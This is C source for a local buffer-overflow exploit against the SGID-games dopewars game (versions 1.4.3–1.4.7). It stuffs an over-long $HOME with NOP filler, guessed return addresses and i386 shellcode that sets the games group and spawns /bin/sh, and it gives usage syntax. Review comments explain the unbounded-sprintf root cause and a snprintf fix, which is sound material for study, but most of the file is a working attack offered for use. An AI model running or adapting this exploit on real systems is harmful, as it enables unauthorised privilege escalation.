/*
 * (linux)dopewars[v1.4.3+] local buffer overflow, by v9[v9@fakehalo.org].
 * dopewars is SGID(=2755)=games by install(make install). this overflow is
 * true for versions of dopewars 1.4.3 to 1.4.7(current).
 *
 * syntax: ./dopewars_bof [offset] [alignment(0-3)]
 *         ./dopewars_bof -200 1
 *
 * the basic overflow(dopewars.c):
 * --
 * pt=getenv("HOME");
 * if (!pt) return;
 * if (strlen(pt) > 770) {
 *   sprintf(ConfigFile,"Home directory %s too long.",pt);
 *   ReportError(ConfigFile);
 *   return;
 * }
 * sprintf(ConfigFile,"%s/.dopewars",pt);
 * --
 * "the home directory is too long! so what? lets continue anyways."
 *
 * note: even in the current version of dopewars(1.4.7) there appear to be
 * some remote overflow possibilities from server->client(bof the client with
 * a bogus server). you can even overflow the server just by simply sending a
 * large string(eip=0x0..). i am just making a note of lots of unchecked
 * buffers. also, $HOME is too common an overflow for this to occur. :)
 *
 * NOTE(review): root cause, as visible in the quoted snippet above: the
 * length check is present, but its error branch formats the over-long $HOME
 * value into the same fixed-size ConfigFile with an unbounded sprintf("%s"),
 * so the check's own diagnostic is the write that overflows; the return
 * after it never helps.  The defensive fix is to never copy the offending
 * value into a bounded buffer (or at minimum to use snprintf with
 * sizeof ConfigFile).  Because the binary is installed SGID games, every
 * environment variable it reads is attacker-controlled input, and the
 * 770-byte limit must be enforced before any copy, not reported with one.
 */

#define PATH "/usr/local/bin/dopewars" // path to the dopewars program.
#define GID 20 // group id of games; patched into exec[10] by main().
#define DEFAULT_OFFSET 200 // if no argument #1.
#define DEFAULT_ALIGN 1 // if no argument #2.

/* i386 Linux payload.  The byte at index 10 (the "\x00" piece below) is
 * overwritten with GID at run time; per the author's own note it sets the
 * group id and then runs the "/bin/sh" string embedded at the end
 * (the bytes \x2f\x62\x69\x6e\x2f\x73\x68).  strlen(exec) is used as the
 * payload length later, so it must not contain a NUL once patched. */
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // soon to be gid=games (replaced by GID before use).
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)

/* Returns the current stack pointer.  The inline asm copies %esp into %eax,
 * the i386 integer return register; there is no C return statement, so the
 * value only survives if the compiler emits nothing that clobbers %eax
 * afterwards.  Compiler- and architecture-specific, not portable C. */
long esp(void){__asm__("movl %esp,%eax");}

/* Builds the over-long $HOME value and execs the target binary.
 *
 *   argv[1] - offset subtracted from esp() to form the guessed return
 *             address (DEFAULT_OFFSET when absent; parsed with atoi, so
 *             non-numeric text silently becomes 0).
 *   argv[2] - alignment 0-3: index in bof at which the repeated 4-byte
 *             address pattern starts (DEFAULT_ALIGN when absent; any other
 *             value is rejected with a message and exit(-1)).
 *
 * Layout written into bof[800]: the guessed address repeated every 4 bytes
 * starting at index align, then 0x90 filler bytes from index 0 up to
 * 800-strlen(exec)-50, then exec copied at that position.  The buffer is
 * then published as $HOME and the target is run via execlp, inheriting the
 * environment.  Returns only if execlp fails. */
int main(int argc,char **argv){
    char bof[800];
    int i,offset,align;
    long ret;

    if(argc>1){offset=atoi(argv[1]);}
    else{offset=DEFAULT_OFFSET;}

    if(argc>2){
        if(atoi(argv[2])>3||atoi(argv[2])<0){
            printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);
            exit(-1);
        }
        else{align=atoi(argv[2]);}
    }
    else{align=DEFAULT_ALIGN;}

    ret=(esp()-offset); // guessed return address: this process's stack minus offset
    printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);

    exec[10]=GID; // the group-id byte in the payload, see the comment on exec above.

    // Repeated guessed address, 4 bytes at a time, starting at index align.
    for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}
    // 0x90 filler over the front of the buffer; leaves the final 50 bytes
    // holding the address pattern written above.
    for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}
    // i is reused: the payload goes immediately after the filler.
    memcpy(bof+i,exec,strlen(exec));

    // The over-long value that the target's sprintf() copies (see header).
    setenv("HOME",bof,1);

    if(execlp(PATH,"dopewars",0)){
        printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);
        exit(-1);
    }
}